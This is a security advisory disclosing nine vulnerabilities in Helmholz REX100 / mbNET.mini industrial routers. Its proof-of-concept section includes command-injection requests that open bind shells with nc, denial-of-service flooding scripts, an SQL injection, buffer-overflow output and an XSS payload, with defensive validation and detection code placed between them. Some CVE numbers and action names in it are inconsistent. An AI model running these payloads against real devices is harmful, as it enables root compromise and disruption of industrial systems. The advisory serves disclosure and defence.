Date: 09/05/2025
Impact: High
CVE IDs: CVE-2025-41673, CVE-2025-41674, CVE-2025-41675, CVE-2025-41676, CVE-2025-41677, CVE-2025-41678, CVE-2025-41679, CVE-2025-41680, CVE-2025-41681

St. Pölten UAS | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini

Helmholz REX100 devices are affected by multiple command injection and buffer overflow vulnerabilities. These issues can be exploited by attackers to execute arbitrary code on the IIoT device.

Vendor description

"Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access."

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3

Vulnerability overview

1) Authenticated Command Injection via send_sms (CVE-2025-41674)
A command injection vulnerability has been identified in the send_sms functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

2) Authenticated Command Injection via diag (CVE-2025-41673)
A command injection vulnerability has been identified in the diag functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
A command injection vulnerability has been identified in the communication.sh endpoint of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
A denial of service condition has been identified in the send_sms functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot.

5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
A denial of service condition has been identified in the send_mail functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot.

6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
An SQL injection vulnerability has been identified in the cloud-status.sh endpoint of the device. An authenticated attacker can exploit this issue to read or modify the SQLite database of the device.

7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the “serial” function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device.

8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the “command” function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device.

9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can abuse this issue to execute malicious JavaScript in the victim's browser when the victim uses the web interface of the device.

Proof of Concept

1) Authenticated Command Injection via send_sms (CVE-2025-41674)
The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to create the file /hello.txt:

POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh

action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'

2) Authenticated Command Injection via diag (CVE-2025-41673)
The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to start a bind shell on port 8080:

POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive

action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh

3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
The action nc in the file communication.sh is vulnerable to a command injection. The following GET request can be used to start a bind shell on port 1337:

curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
-H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
--insecure
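
The three findings above share one root cause: request parameters reach a shell unescaped. As an added illustration, not the vendor's code, the following Python shows how the numb and text values of a send_sms-style action can be validated against an allow-list and handed to a sender program as an argv list, so that no shell ever parses them; the sender path /usr/bin/sms-send, the allow-lists and the use of /bin/echo for the demonstration are assumptions.

```python
#!/usr/bin/env python3
"""Hardened parameter handling for an SMS-style action (illustrative, not Helmholz code)."""
import re
import subprocess

# Allow-lists constructed for this example: an E.164-style number and short plain text.
MSISDN_RE = re.compile(r"\+?[0-9]{3,15}")
TEXT_MAX_LEN = 160
# Characters a POSIX shell would interpret if the value were ever spliced into a command line.
SHELL_META = set("$`|&;<>(){}[]*?!\n\r\\\"'")


class InvalidInput(ValueError):
    """Raised when a request parameter fails validation."""


def validate_sms(numb: str, text: str) -> tuple[str, str]:
    """Reject anything that is not a plain phone number and plain message text."""
    if not MSISDN_RE.fullmatch(numb):
        raise InvalidInput("numb must be a phone number")
    if not text or len(text) > TEXT_MAX_LEN:
        raise InvalidInput("text length out of range")
    if not text.isprintable() or any(ch in SHELL_META for ch in text):
        raise InvalidInput("text contains disallowed characters")
    return numb, text


def build_sms_argv(numb: str, text: str) -> list[str]:
    """Build the argv list for a hypothetical sender tool; values are never passed to a shell."""
    numb, text = validate_sms(numb, text)
    return ["/usr/bin/sms-send", "--to", numb, "--text", text]


def run_without_shell(value: str) -> str:
    """Defence in depth: with an argv list (shell=False) the value reaches the child verbatim.

    /bin/echo only makes the point observable: $(...) is printed, not executed."""
    proc = subprocess.run(["echo", value], capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "test$(echo helloThere > /hello.txt)"   # text value from the request above
    print(run_without_shell(payload))                   # printed literally, no file is created
    try:
        build_sms_argv("'test'", payload)
    except InvalidInput as exc:
        print("rejected:", exc)
    print(build_sms_argv("+4312345678", "hello"))
```
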
4) Authenticated Denial of Service via send_sms (CVE-2025-41676)

The action send_sms is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive.

#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512      # size of the numb and text values
ATTACKS = 1000    # number of concurrent requests

param = {
    'action': 'send_sms',
    'numb': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'

def send_request(i):
    # Each worker authenticates with the test credentials and posts one send_sms request.
    with requests.Session() as s:
        s.auth = ('helmholz', 'router')
        print(f'[+] - Sending Packet NR {i+1}...')
        s.post(url, data=param)

# One thread per request so that all requests are in flight at the same time.
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
    executor.map(send_request, range(ATTACKS))

5) Authenticated Denial of Service via send_mail (CVE-2025-41677)
The action send_mail is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive.

#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24
ATTACKS = 5000
param = {
    'action': 'send_email',
    'addr': 'X' * LENGTH,
    'subj': 'X' * LENGTH,
    'text': 'X' * LENGTH
}
url = f'http://{HOST}{PATH}'
def send_request(i: int) -> None:
    try:
        with requests.Session() as session:
            session.auth = ('helmholz', 'router')
            print(f'[+] Sending packet #{i + 1} ...')
            session.post(url, data=param, timeout=10)
    except requests.RequestException as exc:
        print(f'[-] Packet #{i + 1} failed: {exc}')
def main() -> None:
    with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
        executor.map(send_request, range(ATTACKS))
if __name__ == "__main__":
    main()

6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
An SQL injection has been identified in the cloud-status.sh endpoint of the device. An attacker could leverage this vulnerability to manipulate data inside the SQLite database.

POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes

A verification shows the manipulated data:

$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes

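The following Python is an added example, not the device's code: it rebuilds a config table in an in-memory SQLite database and runs the decoded language value from the request above through the string-concatenation pattern the advisory describes and through a parameterised query. The table layout and the multi-statement executescript call are assumptions made to reproduce the observed effect.

```python
#!/usr/bin/env python3
"""Concatenated vs parameterised SQLite update of a config table (illustrative, not vendor code)."""
import sqlite3
from typing import Optional

# Decoded body of the request above: it closes the intended VALUES(...) and appends a second statement.
ADVISORY_PAYLOAD = "test'); REPLACE INTO config (name,value) VALUES('hacked','yes"


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for /etc/db/config with a constructed config table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE config (name TEXT PRIMARY KEY, value TEXT)")
    conn.execute("INSERT INTO config VALUES ('language', 'en')")
    return conn


def set_language_unsafe(conn: sqlite3.Connection, language: str) -> None:
    """String concatenation plus multi-statement execution: the pattern the advisory describes."""
    sql = f"REPLACE INTO config (name,value) VALUES('language','{language}')"
    conn.executescript(sql)


def set_language_safe(conn: sqlite3.Connection, language: str) -> None:
    """Bound parameter: the value is never parsed as SQL, and execute() runs exactly one statement."""
    conn.execute("REPLACE INTO config (name,value) VALUES('language', ?)", (language,))


def lookup(conn: sqlite3.Connection, name: str) -> Optional[str]:
    """Mirror of the sqlite3 verification query used above."""
    row = conn.execute("SELECT value FROM config WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = fresh_db()
    set_language_unsafe(db, ADVISORY_PAYLOAD)
    print("unsafe ->", lookup(db, "hacked"))                    # yes: the injected statement ran
    db = fresh_db()
    set_language_safe(db, ADVISORY_PAYLOAD)
    print("safe   ->", lookup(db, "hacked"), repr(lookup(db, "language")))  # None, payload stored as text
```
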
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
The overflow is located in the confnet binary. Exploitation requires the serial number of the device. The script published by SySS (www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt) was used to interact with the service.

$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.

9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)

A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can exploit this issue to inject arbitrary JavaScript, which is executed when the "help" page is opened. The impact of this vulnerability is very limited.

POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"
1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"
";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
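Added detection example, not part of the advisory: a small inspector that decodes captured POST bodies or query strings for the CGI endpoints above and flags the shell, SQL and script-injection patterns the proof-of-concept requests contain. The field and endpoint lists are assumptions derived only from the requests shown, the sample captures are constructed, and the multipart XSS request is represented as a urlencoded body.

```python
#!/usr/bin/env python3
"""Inspect captured requests to the REX100 CGI endpoints for the injection patterns shown above."""
import re
from urllib.parse import parse_qs

# Fields the advisory shows being spliced into a shell command (api.sh, communication.sh)
# or into SQL / HTML (cloud-status.sh). Assumed lists, derived only from the requests above.
SHELL_FIELDS = {"numb", "text", "parameter"}
LANG_FIELDS = {"language"}
SHELL_META = re.compile(r"[$`|&;<>]|\s-e\s")
SQL_META = re.compile(r"'\s*\)?\s*;|\b(REPLACE|INSERT|UPDATE|DELETE|UNION|DROP)\b", re.IGNORECASE)
XSS_META = re.compile(r"<script|javascript:|\"\s*;|\bon\w+\s*=", re.IGNORECASE)


def inspect_request(path: str, params: str) -> list[str]:
    """Return findings for one request: its path plus the urlencoded body or query string."""
    findings: list[str] = []
    if not path.startswith("/cgi-bin/"):
        return findings
    for field, values in parse_qs(params, keep_blank_values=True).items():
        for value in values:
            if field in SHELL_FIELDS and SHELL_META.search(value):
                findings.append(f"shell metacharacters in {field}")
            if field in LANG_FIELDS and SQL_META.search(value):
                findings.append(f"SQL syntax in {field}")
            if field in LANG_FIELDS and XSS_META.search(value):
                findings.append(f"script injection in {field}")
    return findings


# Constructed captures: one benign send_sms call followed by the advisory's payloads
# (the multipart XSS request rewritten as a urlencoded body).
SAMPLES = [
    ("/cgi-bin/api.sh", "action=send_sms&numb=%2B431234567&text=hello"),
    ("/cgi-bin/api.sh", "action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'"),
    ("/cgi-bin/api.sh", "action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh"),
    ("/cgi-bin/cloudsvr/communication.sh", "action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh"),
    ("/cgi-bin/cloud-status.sh",
     "language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes"),
    ("/cgi-bin/cloud-status.sh", "langchange=1&language=%22%3Balert(1)%2F%2F%22"),
]


def scan(samples=SAMPLES) -> dict[int, list[str]]:
    """Map each sample index to its findings; samples without findings are omitted."""
    return {i: f for i, (path, params) in enumerate(samples) if (f := inspect_request(path, params))}


if __name__ == "__main__":
    for index, findings in scan().items():
        print(f"sample {index}: {', '.join(findings)}")
```
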

Solution

Update to the latest version.

Workaround

Limit network access to the device or remove it if possible.

Recommendation

St. Pölten UAS recommends that Helmholz customers upgrade the firmware to the latest available version. It is also advised to have a security assessment performed by a professional company.

Technology Used

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.re).

Found by

F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn, G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg, S. Resch, P. Schweinzer, M. Gschiel


Contact Timeline

  • 2025-06-11: Contacting Helmholz via psirt@helmholz.de.
  • 2025-06-16: Contacting them again as their PGP setup was broken.
  • Sending them the advisory via secure channel
  • 2025-06-17: Response from manufacturer mbconnectline. Vulnerabilities are reproducible and are present in latest firmware.
  • 2025-07-21: Coordinated release with PSIRT@VDE and Helmholz.

Author(s)

UAS St. Pölten

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture given by CyberDanube at UAS St. Pölten, students discovered these cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube and the MEDUSA solution.